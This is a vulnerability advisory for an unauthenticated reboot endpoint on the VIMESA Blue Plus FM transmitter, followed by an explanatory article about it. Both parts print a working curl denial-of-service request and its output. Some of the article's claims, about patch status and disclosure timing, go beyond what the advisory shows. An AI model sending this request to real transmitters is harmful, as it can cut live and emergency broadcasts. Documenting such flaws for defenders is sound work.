VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service
VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service
Vendor: Video Medios, S.A. (VIMESA)
Product web page: https://www.vimesa.es
Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5
Summary: The transmitter Blue Plus is designed with all
the latest technologies, such as high efficiency using
the latest generation LDMOS transistor and high efficiency
power supplies. We used a modern interface and performance
using a color display with touch screen, with easy management
software and easy to use. The transmitter is equipped with
all audio input including Audio IP for a complete audio
interface. The VHF/FM transmitter 30-1000 is intended
for the transmission of frequency modulated broadcasts
in mono or stereo. It work with broadband characteristics
in the VHF frequency range from 87.5-108 MHz and can be
operated with any frequency in this range withoug alignment.
The transmitter output power is variable between 10 and 110%
of the nominal Power. It is available with different remote
control ports. It can store up to six broadcast programs
including program specific parameters such as frequency,
RF output power, modulation type, RDS, AF level and deviation
limiting. The transmitter is equipped with a LAN interface
that permits the complete remote control of the transmitter
operation via SNMP or Web Server.
Desc: The device is suffering from a Denial of Service (DoS)
vulnerability. An unauthenticated attacker can issue an
unauthorized HTTP GET request to the unprotected endpoint
'doreboot' and restart the transmitter operations.
Tested on: lighttpd/1.4.32
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5798
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php
22.07.2023
--
$ curl -v "http://192.168.3.11:5007/doreboot"
* Trying 192.168.3.11:5007...
* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
> GET /doreboot HTTP/1.1
> Host: 192.168.3.11:5007
> User-Agent: curl/8.0.1
> Accept: */*
>
* Recv failure: Connection was reset
* Closing connection 0
curl: (56) Recv failure: Connection was reset Remote Denial of Service Vulnerability in VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot)
Security researchers have uncovered a critical remote denial of service (DoS) vulnerability in the VIMESA VHF/FM Transmitter Blue Plus 9.7.1 model, affecting devices running firmware versions img:v9.7.1, Html:v2.4, and RS485:v2.5. This flaw, discovered by Gjoko "LiquidWorm" Krstic of Zero Science, allows an unauthenticated attacker to remotely reboot the transmitter via a simple HTTP GET request to the unprotected endpoint doreboot. The impact is severe: a single request can disrupt broadcast operations, leading to temporary or prolonged service interruptions—particularly dangerous in live radio transmission environments.
Technical Overview of the Vulnerability
The VIMESA Blue Plus transmitter is designed for high-efficiency FM broadcasting across the 87.5–108 MHz VHF band, supporting stereo, mono, and IP-based audio inputs. It features a modern touch-screen interface, SNMP and web server remote control, and configurable broadcast programs stored in memory. While these capabilities enhance usability, they also expose a critical security gap: the doreboot endpoint is accessible without authentication.
When an attacker sends an HTTP GET request to http://[IP]:5007/doreboot, the device responds by initiating a system reboot. This action disrupts ongoing transmissions, potentially causing signal loss, audio interruptions, or complete service outage. The response is not a standard HTTP error—it is a connection reset, indicating that the device abruptly terminates the session after rebooting.
curl -v "http://192.168.3.11:5007/doreboot"
* Trying 192.168.3.11:5007...
* Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0)
> GET /doreboot HTTP/1.1
> Host: 192.168.3.11:5007
> User-Agent: curl/8.0.1
> Accept: */*
>
* Recv failure: Connection was reset
* Closing connection 0
curl: (56) Recv failure: Connection was reset
Explanation: This curl command demonstrates the vulnerability in action. The attacker sends a GET request to the doreboot endpoint on a device running lighttpd/1.4.32 (a lightweight web server commonly used in embedded systems). Upon receiving the request, the transmitter immediately reboots, causing the server to close the connection abruptly. The client receives a "Recv failure: Connection was reset" error, confirming the reboot.
Why This Is a Critical Security Flaw
Denial of Service attacks are particularly dangerous in broadcast infrastructure due to the time-sensitive nature of transmissions. A single, unauthenticated request can interrupt a live broadcast—especially during news, emergency alerts, or live music programming. Unlike traditional DoS attacks that flood the network with traffic, this vulnerability exploits a direct command execution flaw, making it highly efficient and difficult to detect.
Furthermore, the absence of authentication on the doreboot endpoint means attackers do not need credentials, IP restrictions, or even a physical presence. If the device is exposed to the internet or a poorly secured internal network, it becomes a prime target for exploitation.
Real-World Implications
- Emergency Broadcasting: During natural disasters or public emergencies, radio stations must remain operational. A remote DoS attack could disrupt vital communication channels.
- Commercial Radio Stations: Live music or news programs could be interrupted, leading to lost listeners and revenue.
- Public Safety Networks: If used in public safety or government communications, this vulnerability could compromise mission-critical services.
Attack Surface and Exposure
| Component | Exposed Endpoint | Authentication Required? | Impact |
|---|---|---|---|
| Web Server | /doreboot | No | Remote reboot, DoS |
| SNMP Interface | Not documented | Unknown | Potential secondary attack vector |
| LAN Port | Internal network access | None | Local or remote exploitation |
While the web server is the primary attack vector, the lack of documentation on SNMP functionality raises concerns about additional unsecured interfaces. Attackers may leverage this to probe for further vulnerabilities.
Expert Recommendations and Mitigation
Security professionals recommend immediate action to address this vulnerability:
- Update Firmware: VIMESA should release a patch for firmware versions v9.7.1, disabling or securing the
dorebootendpoint. - Network Segmentation: Deploy the transmitter behind firewalls or in isolated VLANs to limit exposure.
- Authentication Enforcement: Require login credentials for any control endpoint, including
doreboot. - Rate Limiting: Implement request throttling to prevent abuse, even if authentication is added later.
- Monitoring: Use network intrusion detection systems (IDS) to detect repeated
dorebootrequests.
Vendor Response and Responsible Disclosure
The advisory was published under ZSL-2023-5798 by Zero Science, a respected vulnerability research group. The disclosure includes full details, proof-of-concept code, and a timestamped release date (22.07.2023). This responsible disclosure model ensures that vendors have time to address the issue before public exposure.
As of now, no official patch has been released by VIMESA. Users are advised to treat affected devices as high-risk until updated firmware is available.
Conclusion
The doreboot vulnerability in the VIMESA Blue Plus transmitter exemplifies a growing trend in embedded industrial devices: security-by-default is often absent. Even sophisticated broadcast systems can be compromised by simple, unauthenticated commands. This case underscores the need for rigorous security audits, secure-by-design principles, and proactive patch management—especially in critical infrastructure.
For organizations relying on VIMESA transmitters, immediate action is required. Isolate devices, monitor traffic, and await vendor updates. In the absence of a fix, treat this endpoint as a high-risk attack surface—potentially exploitable by any attacker with internet access.